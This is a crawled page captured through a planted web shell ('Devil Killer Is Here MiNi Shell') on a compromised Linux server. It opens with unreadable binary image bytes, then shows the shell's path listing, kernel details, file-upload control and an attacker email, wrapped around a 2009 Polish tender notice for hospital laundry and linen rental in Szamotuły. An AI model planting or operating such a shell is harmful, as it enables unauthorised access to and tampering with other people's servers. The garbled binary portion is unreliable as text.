JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/119207-N-2009.html

<p class="kh_header"><b>Szamotuły: Świadczenie kompleksowych usług pralniczych wraz z dzierżawą bielizny i odzieży szpitalnej dla SPZOZ w Szamotułach</b><br>
<b>Numer ogłoszenia: 119207 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Sukiennicza 13, 64-500 Szamotuły, woj. wielkopolskie, tel. 061 2927103, faks 061 2927102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szamotuly.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług pralniczych wraz z dzierżawą bielizny i odzieży szpitalnej dla SPZOZ w Szamotułach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia mieści się w kategoriach CPV 98310000-9 (usługi prania i czyszczenia na sucho), 98310000-6 (usługi odbierania prania),  98315000-4 (usługi prasowania),
2.Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego w systemie ciągłym:  
a.Usługi dzierżawy bielizny szpitalnej wraz z kompleksową usługą pralniczą w ilości 192.000 kg prania przez okres 24 miesięcy 
b.Kompleksowej usługi pralniczej odzieży ochronnej określonej w § 1 pkt. 1 litera d) będącej własnością Zamawiającego w ilości 3.600 kg przez okres 24 miesięcy
3. Szczegółowy rodzaj, ilość oraz asortyment przedmiotu dzierżawy został określony w załączniku nr  1 do niniejszej specyfikacji. 
4. Zamawiający zastrzega sobie prawo zwiększenia lub zmniejszenia ilości oraz rodzaju dziennego zapotrzebowania na dzierżawioną bieliznę. 
5.Kompleksowej usłudze prania podlegać będzie bielizna: 
a.bielizna pościelowa (biała i kolorowa) - czteroskładnikowa składająca się z powłoki, powłoczki, prześcieradła, podkładu itp.; pościel dziecięca, pościel noworodkowa, pokrowce na materace 
b.odzież szpitalna- na którą składają się pidżamy męskie, damskie, koszule zabiegowe oraz położnicze, pieluchy,  śpiochy, kaftaniki, beciki, podomki
c.bielizna operacyjna - prześcieradła operacyjne, fartuchy operacyjne, chusty operacyjne, chusty białe i niebieskie,  bluzy operacyjne, spodnie operacyjne, sukienki operacyjne, spódnice operacyjne, serwety i serwetki operacyjne, fartuchy operacyjne barierowe standardowego i wysokiego ryzyka, obłożenia barierowe do zabiegów itp. 
d.odzież ochronna lekarska  i pielęgniarska  fartuchy lekarskie, bluzy lekarskie, spodnie lekarskie, ubrania lekarskie, kostiumy, pielęgniarskie, płaszcze lekarskie, ubrania ochronne będące na wyposażeniu pracowników pogotowia ratunkowego  
e.inna bielizna - koce z anilany, poduszki, jaśki, materace, serwety, obrusy, parawany, zasłony, firany, pokrowce, podkłady, ręczniki frote oraz bawełniane, materace wraz z pokrowcami paroprzepuszczalnymi itp.
6.Kompleksowa usługa pralnicza polegać będzie w szczególności na odbiorze brudnej bielizny szpitalnej z magazynu brudnej bielizny, segregowanie, pranie (wodne lub w razie potrzeby pranie chemiczne), dezynfekcję, płukanie w płynie antystatycznym, suszenie, maglowanie, prasowanie, segregowanie bielizny wg jej rodzaju, pakowanie w sposób umożliwiający bezpieczny transport oraz w razie konieczności wykonywanie podstawowych napraw szwalniczych, a także dostawę czystej bielizny szpitalnej do magazynu czystej bielizny.
7. Wykonawca zobligowany będzie do świadczenia usług pralniczych:
a.W systemie ciągłym, codziennie (od poniedziałku do soboty)
b.zgodnie z obowiązującymi przepisami prawa z należytą starannością zawodową i gospodarnością, zobowiązując się do zachowania w tajemnicy wszystkich informacji uzyskanych w czasie świadczenia usług objętych niniejszą umową. 
c.usługa wykonywana będzie w pomieszczeniach oraz przy użyciu maszyn i środków piorących Wykonawcy posiadających wymagane przepisami prawa dopuszczenia do obrotu oraz atesty
d.raz na kwartał przedstawienia badań mikrobiologicznych na czystość pranej bielizny
8.Usługa pralnicza świadczona będzie w zakładzie posiadającym    barierę higieniczną i zezwolenie właściwego organu sanitarno - epidemiologicznego na pranie bielizny szpitalnej oraz prania bielizny pochodzącej z oddziałów chorób zakaźnych, a środki piorące i dezynfekcyjne używane do wykonania zamówienia posiadają atesty dopuszczające do stosowania w zakładach opieki zdrowotnej.
9.Wykonawca oświadcza, że transport bielizny szpitalnej odbywać się będzie przy pomocy środków transportu odpowiednio do tego przystosowanymi, będącymi pod stałym nadzorem  właściwego organu sanitarno - epidemiologicznego.
10.Świadczenie usługi pralniczej odbywać się będzie zgodnie z wymogami sanitarno-epidemiologicznymi dla procesów prania i dezynfekcji w zależności od asortymentu, skażenia bielizny i odzieży oraz zgodnie z przedstawioną technologią i warunkami obowiązującymi w placówkach służby zdrowia bezwzględnie przestrzegając zarządzeń i zaleceń  Głównego Inspektora Sanitarnego i zgodnie z rozporządzeniem Ministra Zdrowia z dnia 10.11.2006 r. (Dz. U. Nr 213 poz. 1568 ) z zastosowaniem środków piorących i dezynfekujących posiadających wymagane atesty.
11.Bielizna będąca wyrobem medycznym musi być prana i dezynfekowana w środkach spełniających wymogi ustawy o wyrobach medycznych. Do prania bielizny ogólnego przeznaczenia wymagane jest stosowanie środków biobójczych posiadających aktualny wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Zakres działania dezynfekcyjnego: bakteriobójczy, prątkobójczy, grzybobójczy i wirusobójczy musi być potwierdzony pozytywną opinią zakładu, którego metodyka badań skuteczności produktów biobójczych i substancji czynnych zaakceptowanych przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (np. PZH).
12.Bielizna szpitalna płaska będzie pakowana przez Wykonawcę w rękawy foliowe zgrzewane obustronnie w ilości 5 szt. wg asortymentu. Bielizna fasonowana opakowana będzie w worki foliowe i transportowana na wieszakach jezdnych.
13.W przypadku awarii w zakładzie pralniczym Wykonawcy, zapewni on w czasie trwania kontraktu realizację usługi na własny koszt i ryzyko w innym zakładzie pralniczym spełniającym wymagania określone w  umowie. 
Termin realizacji usługi:
Zamawiający wymaga aby czas realizacji usługi nie przekraczał: 
.24 godzin liczonych od odbioru brudnej bielizny do dostarczenia Zamawiającemu czystej bielizny 
.48 godzin - liczonych od odbioru brudnej bielizny  dla bielizny szpitalnej odbieranej w soboty lub dni bezpośrednio poprzedzające dni świąteczne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.00.00-6, 98.31.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 3.000,00 zł (słownie: trzy tysiące  zł)
2.Wadium należy wnieść przed upływem terminu składania ofert.
3.Wadium może być wniesione w:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)
W przypadku wniesienia wadium w innej formie niż w pieniądzu, oryginał dokumentu wniesienia wadium należy przekazać Zamawiającemu w osobnej kopercie przed upływem terminu składania ofert. 
Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:27 9072 0002 0450 0009 2000 0003
O wpłacie wadium w terminie decydować będzie faktyczny wpływ pieniędzy na konto podane przez Zamawiającego.Zwrot wadium nastąpi zgodnie z przepisami art. 46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; tj:
a)działają na podstawie aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), 
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym, i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
a)Zamawiający uzna za potwierdzony przedmiotowy warunek jeżeli wykonawca wykaże wykonanie minimum 1 usługę prania wraz z dzierżawą bielizny szpitalnej na kwotę nie mniejszą niż 300.000 zł. rocznie oraz załączą dokumenty potwierdzające, że usługi zostały wykonane należycie.  
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia co potwierdzą: 
a)Zamawiający uzna za spełniony powyższy warunek jeżeli wykonawca wykaże się dokumentem ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 300.000 zł. 
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP  co potwierdzą;
a)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,
b)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy. 
5.Ocena spełnienia powyższych warunków będzie dokonywana metodą 0 - 1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.
6.Z treści złożonych dokumentów musi wynikać jednoznacznie, że wykonawca przedmiotowe warunki spełnia. Nie złożenie oświadczenia o spełnianiu warunków ubiegania się o zamówienie lub złożenie dokumentów zawierających błędy będzie skutkowało wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust.3 PZP. 
7.O udzielenie zamówienia mogą ubiegać się Wykonawcy występujący wspólnie. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania oraz wniesienia zabezpieczenia należytego wykonania umowy.
8.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt (V. 1 a, V 4 b) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Zamiast dokumentu, o którym mowa w pkt. V. 4 a  - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
Powyższe dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w punkcie 8 litera a), b) i c) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.oświadczenie o spełnieniu wymagań z art. 22 ust. 1 ustawy - Załącznik Nr 3 do SIWZ;
2.oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ustawy - Załącznik Nr 4 do SIWZ;
3.aktualny odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4.aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartościom dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - wg wzoru stanowiącego załącznik nr 5 do  siwz 
7.oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie 
8.polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  zgodnie z warunkiem określonym w punkcie V.3 
9.Na potwierdzenie, że oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda: 
a)Zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, odwołującym się do systemów zapewniania jakości opartych na odpowiednich normach europejskich tj. 
-Aktualna opinia sanitarna, potwierdzająca, że pralnia, w której będzie świadczona usługa prania jest pod nadzorem właściwego Inspektora Sanitarnego, oraz że spełnia wymagania dotyczące prania bielizny i odzieży szpitalnej oraz bielizny noworodkowej i dermatologicznej określone w rozporządzeniu Ministra Zdrowia w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej z dnia 10 listopada 2006r. z póżn. zm.- posiada barierę higieniczną w Zał. nr 1 pkt. XIV (Dz. U. Nr 213 poz. 1568).
-Aktualna opinia sanitarna potwierdzająca, że Wykonawca spełnia wymagania wymagania właściwego Inspektora Sanitarnego dotyczącego transportu bielizny szpitalnej. 
Wykonawca może zamiast zaświadczeń, o których mowa w punkcie 9 złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.  
Podmioty majace siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej skłądają dokumnety dokumenty określone w punkcie V 8 siwz. 
Inne dokumenty składające się na treść oferty: 
1.Formularz ofertowy wraz z załącznikami 
2.Potwierdzenie wpłaty wadium 
3.Oryginał pełnomocnictwa, jeżeli wykonawcy wspólnie ubiegają się o zamówienie publiczne do złożenia oferty lub złożenia oferty i podpisania umowy
4.Oryginał pełnomocnictwa, jeżeli uprawnienie do złożenia oferty nie wynika z dokumentów rejestrowych
5.Wykaz środków piorących i dezynfekujących jakie zamierza użyć Wykonawca do realizacji usługi. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia dokumenty o których mowa w VI 1-5, 8 muszą być złożone przez każdego Wykonawcę odrębnie. Pozostałe dokumenty wykonawcy mogą złożyć łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szamotuly.med.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Sukiennicza 13
64-500 Szamotuły.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Sukiennicza 13
64-500 Szamotuły
Sekretariat Dyrektora.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com